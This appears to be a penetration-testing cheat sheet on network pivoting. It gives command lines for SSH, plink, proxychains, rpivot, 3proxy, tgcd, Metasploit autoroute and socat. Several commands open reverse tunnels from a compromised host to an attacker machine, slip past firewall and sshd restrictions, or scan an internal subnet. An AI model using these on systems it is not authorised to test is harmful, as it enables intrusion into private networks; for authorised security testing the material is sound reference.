Pivoting
Contents
rinetd
root #
rinetd -f -c rinetd.conf
root #
cat rinetd.conf
plink.exe
ssh for windows: plink.exe
C:>
plink -l root -pw pass -R 3389:127.0.0.1:3389 $IP -P 80 -N
ssh / OpenSSH
ssh local port forwarding ("proxy", on the attacker machine)
Local port → Remote server
root #
ssh <GATEWAY/SSH server> -L <PORT>:<REMOTE SERVER>:<REMOTE PORT>
root #
ssh -L <localhost port>:<remote IP>:<remote port> $IP
Remote redirection (ssh remote port forwarding ("reverse shell", on a compromised machine))
root #
ssh -R <REMOTE PORT>:<LOCAL HOST>:<LOCAL PORT> $IP
root #
ssh -R <server side port>:<localhost>:<local port> $IP
with ssh -L / -R local mapped ports are always mapped to 127.0.0.1 to map them to eth0/tun0 ifaces, use tgcd or socat!
Open question: How to forward local apache in attacker machine to private LAN network through pivoting
Dynamic port forwarding (socks4/5 proxy)
root #
ssh -D <LOCAL PROXY PORT> -p <REMOTE PORT> <TARGET>
VPN over SSH
/etc/ssh/sshd_config PermitRootLogin yes PermitTunnel yes
root #
ssh [email protected] -w any:any
Routing not automatic, add routes and gateway. Also on server, ip forwarding
proxychains
From compromised machine (hax0r user)
root #
ssh -f -N -R 2222:127.0.0.1:22 [email protected]
root #
ssh -f -N -D 127.0.0.1:8080 -p 2222 [email protected]
Edit /etc/proxychains.conf
[ProxyList] socks4 127.0.0.1 8080
proxychains only allows TCP connect traffic!!!! And incredibly slow!
root #
proxychains nmap --top-ports=20 -sT -Pn $IP/24
For proxying DNS change /usr/lib/proxychains3/proxyresolv.
FreeSSHd.exe
Good to install on target for pivoting!!
tinyproxy
https://github.com/tinyproxy/tinyproxy
rpivot
- Reverse socks proxy / Opposite to ssh -D / Supports windows credentials to use with a corporate proxy
- Server should be started on pentester's machine and listen to incoming connections from the client.
- Python but no dependencies
Pentester machine (listener):
$
python server.py --proxy-port 1080 --server-port 9900 --server-ip $IP
Target machine (if egress traffic not firewalled)
$
python client.py --server-ip $IP --server-port 9900
3proxy
On target: (Can bypass target sshd tcp forwarding restrictions)
For SOCKS proxy:
$
cat 3proxy.config
For port redirection:
$
cat 3proxy.config
Run:
$
./3proxy 3proxy.config &
tgcd
tgcd is a simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls. This can also be used by network analysts and security experts for penetration testing and analyze the security of their network. This program has 3 different modes: - CC (ConnectConnect) - LL (ListenListen) - PF (PortForwarder) CC and LL nodes are used together to provide access to a service inside a Local Area Network to the external network. PF node is, however, only a simple port forwarder.
On attacker (Do not support VPN):
$
tgcd -L -p 9090 -q 4000 [-e tap0] -n -g 10
On target:
$
tgcd -C -s $IP:8080 -c $ATTACKER:4000 -n -g 10
Metasploit
msf> use auxiliary/server/socks4a msf> run -j or meterpreter> run autoroute -s $IP/24 meterpreter > run autoroute -p or msf exploit(handler) > route add $IP 255.255.255.0 1
ssf
socat
- Socat TCP GENDER CHANGER
On inside LAN server:
root #
socat -d -d -d -t5 tcp:$IP:80,forever,intervall=10,fork tcp:localhost:80
On outside LAN client:
root #
socat -d -d -d tcp-l:80,reuseaddr,bind=127.0.0.1,fork tcp-l:80,bind=$IP,reuseaddr,retry=10
Connect with outside client:
$
mozilla http://127.0.0.1/
- Socat SSH encapsulation into SSL
On server:
root #
socat ssl-l:443,reuseaddr,fork,cert=./server.pem,verify=0 exec:'/usr/sbin/sshd -i'
on client:
root #
ssh -o ProxyCommand="socat - 'ssl,verify=0|proxy-connect:%h:443|tcp:proxy:8080" $SERVER
- Socat SSH deception (Bounds back to the client ssh server)
root #
socat -d -d TCP-L:22,reuseaddr,fork SYSTEM:"nc \$SOCAT_PEERADDR 22"
Source: https://twitter.com/climagic/status/1079026659435704320
See also socat
References:
- Gerhard Rieger http://www.dest-unreach.org/socat